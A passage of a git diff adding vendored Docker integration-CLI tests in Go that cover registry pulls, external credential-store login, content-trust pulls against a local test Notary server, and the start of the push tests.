c.Assert(err, checker.IsNil, check.Commentf("error marshalling manifest list")) + + manifestListDigest := digest.FromBytes(manifestListJSON) + hexDigest := manifestListDigest.Hex() + + registryV2Path := filepath.Join(s.reg.dir, "docker", "registry", "v2") + + // Write manifest list to blob store + blobDir := filepath.Join(registryV2Path, "blobs", "sha256", hexDigest[:2], hexDigest) + err = os.MkdirAll(blobDir, 0755) + c.Assert(err, checker.IsNil, check.Commentf("error creating blob dir")) + blobPath := filepath.Join(blobDir, "data") + err = ioutil.WriteFile(blobPath, []byte(manifestListJSON), 0644) + c.Assert(err, checker.IsNil, check.Commentf("error writing manifest list")) + + // Add to revision store + revisionDir := filepath.Join(registryV2Path, "repositories", remoteRepoName, "_manifests", "revisions", "sha256", hexDigest) + err = os.Mkdir(revisionDir, 0755) + c.Assert(err, checker.IsNil, check.Commentf("error creating revision dir")) + revisionPath := filepath.Join(revisionDir, "link") + err = ioutil.WriteFile(revisionPath, []byte(manifestListDigest.String()), 0644) + c.Assert(err, checker.IsNil, check.Commentf("error writing revision link")) + + // Update tag + tagPath := filepath.Join(registryV2Path, "repositories", remoteRepoName, "_manifests", "tags", "latest", "current", "link") + err = ioutil.WriteFile(tagPath, []byte(manifestListDigest.String()), 0644) + c.Assert(err, checker.IsNil, check.Commentf("error writing tag link")) + + // Verify that the image can be pulled through the manifest list. + out, _ := dockerCmd(c, "pull", repoName) + + // The pull output includes "Digest: ", so find that + matches := digestRegex.FindStringSubmatch(out) + c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out)) + pullDigest := matches[1] + + // Make sure the pushed and pull digests match + c.Assert(manifestListDigest.String(), checker.Equals, pullDigest) + + // Was the image actually created? + dockerCmd(c, "inspect", repoName) + + dockerCmd(c, "rmi", repoName) +} + +// #23100 +func (s *DockerRegistryAuthHtpasswdSuite) TestPullWithExternalAuthLoginWithScheme(c *check.C) { + osPath := os.Getenv("PATH") + defer os.Setenv("PATH", osPath) + + workingDir, err := os.Getwd() + c.Assert(err, checker.IsNil) + absolute, err := filepath.Abs(filepath.Join(workingDir, "fixtures", "auth")) + c.Assert(err, checker.IsNil) + testPath := fmt.Sprintf("%s%c%s", osPath, filepath.ListSeparator, absolute) + + os.Setenv("PATH", testPath) + + repoName := fmt.Sprintf("%v/dockercli/busybox:authtest", privateRegistryURL) + + tmp, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + + externalAuthConfig := `{ "credsStore": "shell-test" }` + + configPath := filepath.Join(tmp, "config.json") + err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + + b, err := ioutil.ReadFile(configPath) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Not(checker.Contains), "\"auth\":") + + dockerCmd(c, "--config", tmp, "tag", "busybox", repoName) + dockerCmd(c, "--config", tmp, "push", repoName) + + dockerCmd(c, "--config", tmp, "logout", privateRegistryURL) + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, "https://"+privateRegistryURL) + dockerCmd(c, "--config", tmp, "pull", repoName) + + // likewise push should work + repoName2 := fmt.Sprintf("%v/dockercli/busybox:nocreds", privateRegistryURL) + dockerCmd(c, "tag", repoName, repoName2) + dockerCmd(c, "--config", tmp, "push", repoName2) + + // logout should work w scheme also because it will be stripped + dockerCmd(c, "--config", tmp, "logout", "https://"+privateRegistryURL) +} + +func (s *DockerRegistryAuthHtpasswdSuite) TestPullWithExternalAuth(c *check.C) { + osPath := os.Getenv("PATH") + defer os.Setenv("PATH", osPath) + + workingDir, err := os.Getwd() + c.Assert(err, checker.IsNil) + absolute, err := filepath.Abs(filepath.Join(workingDir, "fixtures", "auth")) + c.Assert(err, checker.IsNil) + testPath := fmt.Sprintf("%s%c%s", osPath, filepath.ListSeparator, absolute) + + os.Setenv("PATH", testPath) + + repoName := fmt.Sprintf("%v/dockercli/busybox:authtest", privateRegistryURL) + + tmp, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + + externalAuthConfig := `{ "credsStore": "shell-test" }` + + configPath := filepath.Join(tmp, "config.json") + err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + + b, err := ioutil.ReadFile(configPath) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Not(checker.Contains), "\"auth\":") + + dockerCmd(c, "--config", tmp, "tag", "busybox", repoName) + dockerCmd(c, "--config", tmp, "push", repoName) + + dockerCmd(c, "--config", tmp, "pull", repoName) +} + +// TestRunImplicitPullWithNoTag should pull implicitly only the default tag (latest) +func (s *DockerRegistrySuite) TestRunImplicitPullWithNoTag(c *check.C) { + testRequires(c, DaemonIsLinux) + repo := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + repoTag1 := fmt.Sprintf("%v:latest", repo) + repoTag2 := fmt.Sprintf("%v:t1", repo) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoTag1) + dockerCmd(c, "tag", "busybox", repoTag2) + dockerCmd(c, "push", repo) + dockerCmd(c, "rmi", repoTag1) + dockerCmd(c, "rmi", repoTag2) + + out, _, err := dockerCmdWithError("run", repo) + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Unable to find image '%s:latest' locally", repo)) + + // There should be only one line for repo, the one with repo:latest + outImageCmd, _, err := dockerCmdWithError("images", repo) + splitOutImageCmd := strings.Split(strings.TrimSpace(outImageCmd), "\n") + c.Assert(splitOutImageCmd, checker.HasLen, 2) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go new file mode 100644 index 0000000000..a0118a8e95 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go @@ -0,0 +1,274 @@ +package main + +import ( + "fmt" + "regexp" + "strings" + "sync" + "time" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// TestPullFromCentralRegistry pulls an image from the central registry and verifies that the client +// prints all expected output. +func (s *DockerHubPullSuite) TestPullFromCentralRegistry(c *check.C) { + testRequires(c, DaemonIsLinux) + out := s.Cmd(c, "pull", "hello-world") + defer deleteImages("hello-world") + + c.Assert(out, checker.Contains, "Using default tag: latest", check.Commentf("expected the 'latest' tag to be automatically assumed")) + c.Assert(out, checker.Contains, "Pulling from library/hello-world", check.Commentf("expected the 'library/' prefix to be automatically assumed")) + c.Assert(out, checker.Contains, "Downloaded newer image for hello-world:latest") + + matches := regexp.MustCompile(`Digest: (.+)\n`).FindAllStringSubmatch(out, -1) + c.Assert(len(matches), checker.Equals, 1, check.Commentf("expected exactly one image digest in the output")) + c.Assert(len(matches[0]), checker.Equals, 2, check.Commentf("unexpected number of submatches for the digest")) + _, err := digest.ParseDigest(matches[0][1]) + c.Check(err, checker.IsNil, check.Commentf("invalid digest %q in output", matches[0][1])) + + // We should have a single entry in images. + img := strings.TrimSpace(s.Cmd(c, "images")) + splitImg := strings.Split(img, "\n") + c.Assert(splitImg, checker.HasLen, 2) + c.Assert(splitImg[1], checker.Matches, `hello-world\s+latest.*?`, check.Commentf("invalid output for `docker images` (expected image and tag name")) +} + +// TestPullNonExistingImage pulls non-existing images from the central registry, with different +// combinations of implicit tag and library prefix. +func (s *DockerHubPullSuite) TestPullNonExistingImage(c *check.C) { + testRequires(c, DaemonIsLinux) + + type entry struct { + repo string + alias string + tag string + } + + entries := []entry{ + {"asdfasdf", "asdfasdf", "foobar"}, + {"asdfasdf", "library/asdfasdf", "foobar"}, + {"asdfasdf", "asdfasdf", ""}, + {"asdfasdf", "asdfasdf", "latest"}, + {"asdfasdf", "library/asdfasdf", ""}, + {"asdfasdf", "library/asdfasdf", "latest"}, + } + + // The option field indicates "-a" or not. + type record struct { + e entry + option string + out string + err error + } + + // Execute 'docker pull' in parallel, pass results (out, err) and + // necessary information ("-a" or not, and the image name) to channel. + var group sync.WaitGroup + recordChan := make(chan record, len(entries)*2) + for _, e := range entries { + group.Add(1) + go func(e entry) { + defer group.Done() + repoName := e.alias + if e.tag != "" { + repoName += ":" + e.tag + } + out, err := s.CmdWithError("pull", repoName) + recordChan <- record{e, "", out, err} + }(e) + if e.tag == "" { + // pull -a on a nonexistent registry should fall back as well + group.Add(1) + go func(e entry) { + defer group.Done() + out, err := s.CmdWithError("pull", "-a", e.alias) + recordChan <- record{e, "-a", out, err} + }(e) + } + } + + // Wait for completion + group.Wait() + close(recordChan) + + // Process the results (out, err). + for record := range recordChan { + if len(record.option) == 0 { + c.Assert(record.err, checker.NotNil, check.Commentf("expected non-zero exit status when pulling non-existing image: %s", record.out)) + c.Assert(record.out, checker.Contains, fmt.Sprintf("repository %s not found: does not exist or no pull access", record.e.repo), check.Commentf("expected image not found error messages")) + } else { + // pull -a on a nonexistent registry should fall back as well + c.Assert(record.err, checker.NotNil, check.Commentf("expected non-zero exit status when pulling non-existing image: %s", record.out)) + c.Assert(record.out, checker.Contains, fmt.Sprintf("repository %s not found", record.e.repo), check.Commentf("expected image not found error messages")) + c.Assert(record.out, checker.Not(checker.Contains), "unauthorized", check.Commentf(`message should not contain "unauthorized"`)) + } + } + +} + +// TestPullFromCentralRegistryImplicitRefParts pulls an image from the central registry and verifies +// that pulling the same image with different combinations of implicit elements of the the image +// reference (tag, repository, central registry url, ...) doesn't trigger a new pull nor leads to +// multiple images. +func (s *DockerHubPullSuite) TestPullFromCentralRegistryImplicitRefParts(c *check.C) { + testRequires(c, DaemonIsLinux) + + // Pull hello-world from v2 + pullFromV2 := func(ref string) (int, string) { + out := s.Cmd(c, "pull", "hello-world") + v1Retries := 0 + for strings.Contains(out, "this image was pulled from a legacy registry") { + // Some network errors may cause fallbacks to the v1 + // protocol, which would violate the test's assumption + // that it will get the same images. To make the test + // more robust against these network glitches, allow a + // few retries if we end up with a v1 pull. + + if v1Retries > 2 { + c.Fatalf("too many v1 fallback incidents when pulling %s", ref) + } + + s.Cmd(c, "rmi", ref) + out = s.Cmd(c, "pull", ref) + + v1Retries++ + } + + return v1Retries, out + } + + pullFromV2("hello-world") + defer deleteImages("hello-world") + + s.Cmd(c, "tag", "hello-world", "hello-world-backup") + + for _, ref := range []string{ + "hello-world", + "hello-world:latest", + "library/hello-world", + "library/hello-world:latest", + "docker.io/library/hello-world", + "index.docker.io/library/hello-world", + } { + var out string + for { + var v1Retries int + v1Retries, out = pullFromV2(ref) + + // Keep repeating the test case until we don't hit a v1 + // fallback case. We won't get the right "Image is up + // to date" message if the local image was replaced + // with one pulled from v1. + if v1Retries == 0 { + break + } + s.Cmd(c, "rmi", ref) + s.Cmd(c, "tag", "hello-world-backup", "hello-world") + } + c.Assert(out, checker.Contains, "Image is up to date for hello-world:latest") + } + + s.Cmd(c, "rmi", "hello-world-backup") + + // We should have a single entry in images. + img := strings.TrimSpace(s.Cmd(c, "images")) + splitImg := strings.Split(img, "\n") + c.Assert(splitImg, checker.HasLen, 2) + c.Assert(splitImg[1], checker.Matches, `hello-world\s+latest.*?`, check.Commentf("invalid output for `docker images` (expected image and tag name")) +} + +// TestPullScratchNotAllowed verifies that pulling 'scratch' is rejected. +func (s *DockerHubPullSuite) TestPullScratchNotAllowed(c *check.C) { + testRequires(c, DaemonIsLinux) + out, err := s.CmdWithError("pull", "scratch") + c.Assert(err, checker.NotNil, check.Commentf("expected pull of scratch to fail")) + c.Assert(out, checker.Contains, "'scratch' is a reserved name") + c.Assert(out, checker.Not(checker.Contains), "Pulling repository scratch") +} + +// TestPullAllTagsFromCentralRegistry pulls using `all-tags` for a given image and verifies that it +// results in more images than a naked pull. +func (s *DockerHubPullSuite) TestPullAllTagsFromCentralRegistry(c *check.C) { + testRequires(c, DaemonIsLinux) + s.Cmd(c, "pull", "busybox") + outImageCmd := s.Cmd(c, "images", "busybox") + splitOutImageCmd := strings.Split(strings.TrimSpace(outImageCmd), "\n") + c.Assert(splitOutImageCmd, checker.HasLen, 2) + + s.Cmd(c, "pull", "--all-tags=true", "busybox") + outImageAllTagCmd := s.Cmd(c, "images", "busybox") + linesCount := strings.Count(outImageAllTagCmd, "\n") + c.Assert(linesCount, checker.GreaterThan, 2, check.Commentf("pulling all tags should provide more than two images, got %s", outImageAllTagCmd)) + + // Verify that the line for 'busybox:latest' is left unchanged. + var latestLine string + for _, line := range strings.Split(outImageAllTagCmd, "\n") { + if strings.HasPrefix(line, "busybox") && strings.Contains(line, "latest") { + latestLine = line + break + } + } + c.Assert(latestLine, checker.Not(checker.Equals), "", check.Commentf("no entry for busybox:latest found after pulling all tags")) + splitLatest := strings.Fields(latestLine) + splitCurrent := strings.Fields(splitOutImageCmd[1]) + + // Clear relative creation times, since these can easily change between + // two invocations of "docker images". Without this, the test can fail + // like this: + // ... obtained []string = []string{"busybox", "latest", "d9551b4026f0", "27", "minutes", "ago", "1.113", "MB"} + // ... expected []string = []string{"busybox", "latest", "d9551b4026f0", "26", "minutes", "ago", "1.113", "MB"} + splitLatest[3] = "" + splitLatest[4] = "" + splitLatest[5] = "" + splitCurrent[3] = "" + splitCurrent[4] = "" + splitCurrent[5] = "" + + c.Assert(splitLatest, checker.DeepEquals, splitCurrent, check.Commentf("busybox:latest was changed after pulling all tags")) +} + +// TestPullClientDisconnect kills the client during a pull operation and verifies that the operation +// gets cancelled. +// +// Ref: docker/docker#15589 +func (s *DockerHubPullSuite) TestPullClientDisconnect(c *check.C) { + testRequires(c, DaemonIsLinux) + repoName := "hello-world:latest" + + pullCmd := s.MakeCmd("pull", repoName) + stdout, err := pullCmd.StdoutPipe() + c.Assert(err, checker.IsNil) + err = pullCmd.Start() + c.Assert(err, checker.IsNil) + + // Cancel as soon as we get some output. + buf := make([]byte, 10) + _, err = stdout.Read(buf) + c.Assert(err, checker.IsNil) + + err = pullCmd.Process.Kill() + c.Assert(err, checker.IsNil) + + time.Sleep(2 * time.Second) + _, err = s.CmdWithError("inspect", repoName) + c.Assert(err, checker.NotNil, check.Commentf("image was pulled after client disconnected")) +} + +func (s *DockerRegistryAuthHtpasswdSuite) TestPullNoCredentialsNotFound(c *check.C) { + // we don't care about the actual image, we just want to see image not found + // because that means v2 call returned 401 and we fell back to v1 which usually + // gives a 404 (in this case the test registry doesn't handle v1 at all) + out, _, err := dockerCmdWithError("pull", privateRegistryURL+"/busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Error: image busybox:latest not found") +} + +// Regression test for https://github.com/docker/docker/issues/26429 +func (s *DockerSuite) TestPullLinuxImageFailsOnWindows(c *check.C) { + testRequires(c, DaemonIsWindows, Network) + _, _, err := dockerCmdWithError("pull", "ubuntu") + c.Assert(err.Error(), checker.Contains, "cannot be used on this platform") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go new file mode 100644 index 0000000000..96a42d6758 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go @@ -0,0 +1,365 @@ +package main + +import ( + "fmt" + "io/ioutil" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerTrustSuite) TestTrustedPull(c *check.C) { + repoName := s.setupTrustedImage(c, "trusted-pull") + + // Try pull + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err := runCommandWithOutput(pullCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) + + dockerCmd(c, "rmi", repoName) + // Try untrusted pull to ensure we pushed the tag to the registry + pullCmd = exec.Command(dockerBinary, "pull", "--disable-content-trust=true", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out)) + +} + +func (s *DockerTrustSuite) TestTrustedIsolatedPull(c *check.C) { + repoName := s.setupTrustedImage(c, "trusted-isolated-pull") + + // Try pull (run from isolated directory without trust information) + pullCmd := exec.Command(dockerBinary, "--config", "/tmp/docker-isolated", "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err := runCommandWithOutput(pullCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(string(out))) + + dockerCmd(c, "rmi", repoName) +} + +func (s *DockerTrustSuite) TestUntrustedPull(c *check.C) { + repoName := fmt.Sprintf("%v/dockercliuntrusted/pulltest:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + dockerCmd(c, "push", repoName) + dockerCmd(c, "rmi", repoName) + + // Try trusted pull on untrusted tag + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err := runCommandWithOutput(pullCmd) + + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out)) +} + +func (s *DockerTrustSuite) TestPullWhenCertExpired(c *check.C) { + c.Skip("Currently changes system time, causing instability") + repoName := s.setupTrustedImage(c, "trusted-cert-expired") + + // Certificates have 10 years of expiration + elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11) + + runAtDifferentDate(elevenYearsFromNow, func() { + // Try pull + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err := runCommandWithOutput(pullCmd) + + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "could not validate the path to a trusted root", check.Commentf(out)) + }) + + runAtDifferentDate(elevenYearsFromNow, func() { + // Try pull + pullCmd := exec.Command(dockerBinary, "pull", "--disable-content-trust", repoName) + s.trustedCmd(pullCmd) + out, _, err := runCommandWithOutput(pullCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out)) + }) +} + +func (s *DockerTrustSuite) TestTrustedPullFromBadTrustServer(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclievilpull/trusted:latest", privateRegistryURL) + evilLocalConfigDir, err := ioutil.TempDir("", "evil-local-config-dir") + if err != nil { + c.Fatalf("Failed to create local temp dir") + } + + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out)) + dockerCmd(c, "rmi", repoName) + + // Try pull + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) + dockerCmd(c, "rmi", repoName) + + // Kill the notary server, start a new "evil" one. + s.not.Close() + s.not, err = newTestNotary(c) + + c.Assert(err, check.IsNil, check.Commentf("Restarting notary server failed.")) + + // In order to make an evil server, lets re-init a client (with a different trust dir) and push new data. + // tag an image and upload it to the private registry + dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName) + + // Push up to the new server + pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err = runCommandWithOutput(pushCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out)) + + // Now, try pulling with the original client from this new trust server. This should fail because the new root is invalid. + pullCmd = exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + if err == nil { + c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out) + } + if !strings.Contains(out, "could not rotate trust to a new trusted root") { + c.Fatalf("Missing expected output on trusted pull:\n%s", out) + } +} + +func (s *DockerTrustSuite) TestTrustedPullWithExpiredSnapshot(c *check.C) { + c.Skip("Currently changes system time, causing instability") + repoName := fmt.Sprintf("%v/dockercliexpiredtimestamppull/trusted:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + // Push with default passphrases + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out)) + + dockerCmd(c, "rmi", repoName) + + // Snapshots last for three years. This should be expired + fourYearsLater := time.Now().Add(time.Hour * 24 * 365 * 4) + + runAtDifferentDate(fourYearsLater, func() { + // Try pull + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + + c.Assert(err, check.NotNil, check.Commentf("Missing expected error running trusted pull with expired snapshots")) + c.Assert(string(out), checker.Contains, "repository out-of-date", check.Commentf(out)) + }) +} + +func (s *DockerTrustSuite) TestTrustedOfflinePull(c *check.C) { + repoName := s.setupTrustedImage(c, "trusted-offline-pull") + + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmdWithServer(pullCmd, "https://invalidnotaryserver") + out, _, err := runCommandWithOutput(pullCmd) + + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "error contacting notary server", check.Commentf(out)) + // Do valid trusted pull to warm cache + pullCmd = exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) + + dockerCmd(c, "rmi", repoName) + + // Try pull again with invalid notary server, should use cache + pullCmd = exec.Command(dockerBinary, "pull", repoName) + s.trustedCmdWithServer(pullCmd, "https://invalidnotaryserver") + out, _, err = runCommandWithOutput(pullCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) +} + +func (s *DockerTrustSuite) TestTrustedPullDelete(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, "trusted-pull-delete") + // tag the image and upload it to the private registry + _, err := buildImage(repoName, ` + FROM busybox + CMD echo trustedpulldelete + `, true) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + if err != nil { + c.Fatalf("Error running trusted push: %s\n%s", err, out) + } + if !strings.Contains(string(out), "Signing and pushing trust metadata") { + c.Fatalf("Missing expected output on trusted push:\n%s", out) + } + + if out, status := dockerCmd(c, "rmi", repoName); status != 0 { + c.Fatalf("Error removing image %q\n%s", repoName, out) + } + + // Try pull + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + + c.Assert(err, check.IsNil, check.Commentf(out)) + + matches := digestRegex.FindStringSubmatch(out) + c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out)) + pullDigest := matches[1] + + imageID := inspectField(c, repoName, "Id") + + imageByDigest := repoName + "@" + pullDigest + byDigestID := inspectField(c, imageByDigest, "Id") + + c.Assert(byDigestID, checker.Equals, imageID) + + // rmi of tag should also remove the digest reference + dockerCmd(c, "rmi", repoName) + + _, err = inspectFieldWithError(imageByDigest, "Id") + c.Assert(err, checker.NotNil, check.Commentf("digest reference should have been removed")) + + _, err = inspectFieldWithError(imageID, "Id") + c.Assert(err, checker.NotNil, check.Commentf("image should have been deleted")) +} + +func (s *DockerTrustSuite) TestTrustedPullReadsFromReleasesRole(c *check.C) { + testRequires(c, NotaryHosting) + repoName := fmt.Sprintf("%v/dockerclireleasesdelegationpulling/trusted", privateRegistryURL) + targetName := fmt.Sprintf("%s:latest", repoName) + + // Push with targets first, initializing the repo + dockerCmd(c, "tag", "busybox", targetName) + pushCmd := exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + s.assertTargetInRoles(c, repoName, "latest", "targets") + + // Try pull, check we retrieve from targets role + pullCmd := exec.Command(dockerBinary, "-D", "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "retrieving target for targets role") + + // Now we'll create the releases role, and try pushing and pulling + s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public) + s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private) + s.notaryPublish(c, repoName) + + // try a pull, check that we can still pull because we can still read the + // old tag in the targets role + pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "retrieving target for targets role") + + // try a pull -a, check that it succeeds because we can still pull from the + // targets role + pullCmd = exec.Command(dockerBinary, "-D", "pull", "-a", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Push, should sign with targets/releases + dockerCmd(c, "tag", "busybox", targetName) + pushCmd = exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err = runCommandWithOutput(pushCmd) + s.assertTargetInRoles(c, repoName, "latest", "targets", "targets/releases") + + // Try pull, check we retrieve from targets/releases role + pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(out, checker.Contains, "retrieving target for targets/releases role") + + // Create another delegation that we'll sign with + s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[1].Public) + s.notaryImportKey(c, repoName, "targets/other", s.not.keys[1].Private) + s.notaryPublish(c, repoName) + + dockerCmd(c, "tag", "busybox", targetName) + pushCmd = exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err = runCommandWithOutput(pushCmd) + s.assertTargetInRoles(c, repoName, "latest", "targets", "targets/releases", "targets/other") + + // Try pull, check we retrieve from targets/releases role + pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(out, checker.Contains, "retrieving target for targets/releases role") +} + +func (s *DockerTrustSuite) TestTrustedPullIgnoresOtherDelegationRoles(c *check.C) { + testRequires(c, NotaryHosting) + repoName := fmt.Sprintf("%v/dockerclipullotherdelegation/trusted", privateRegistryURL) + targetName := fmt.Sprintf("%s:latest", repoName) + + // We'll create a repo first with a non-release delegation role, so that when we + // push we'll sign it into the delegation role + s.notaryInitRepo(c, repoName) + s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[0].Public) + s.notaryImportKey(c, repoName, "targets/other", s.not.keys[0].Private) + s.notaryPublish(c, repoName) + + // Push should write to the delegation role, not targets + dockerCmd(c, "tag", "busybox", targetName) + pushCmd := exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + s.assertTargetInRoles(c, repoName, "latest", "targets/other") + s.assertTargetNotInRoles(c, repoName, "latest", "targets") + + // Try pull - we should fail, since pull will only pull from the targets/releases + // role or the targets role + pullCmd := exec.Command(dockerBinary, "-D", "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "No trust data for") + + // try a pull -a: we should fail since pull will only pull from the targets/releases + // role or the targets role + pullCmd = exec.Command(dockerBinary, "-D", "pull", "-a", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "No trusted tags for") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go new file mode 100644 index 0000000000..f750c12674 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go @@ -0,0 +1,715 @@ +package main + +import ( + "archive/tar" + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "os/exec" + "path/filepath" + "strings" + "sync" + "time" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// Pushing an image to a private registry. +func testPushBusyboxImage(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + // tag the image to upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + // push the image to the registry + dockerCmd(c, "push", repoName) +} + +func (s *DockerRegistrySuite) TestPushBusyboxImage(c *check.C) { + testPushBusyboxImage(c) +} + +func (s *DockerSchema1RegistrySuite) TestPushBusyboxImage(c *check.C) { + testPushBusyboxImage(c) +} + +// pushing an image without a prefix should throw an error +func (s *DockerSuite) TestPushUnprefixedRepo(c 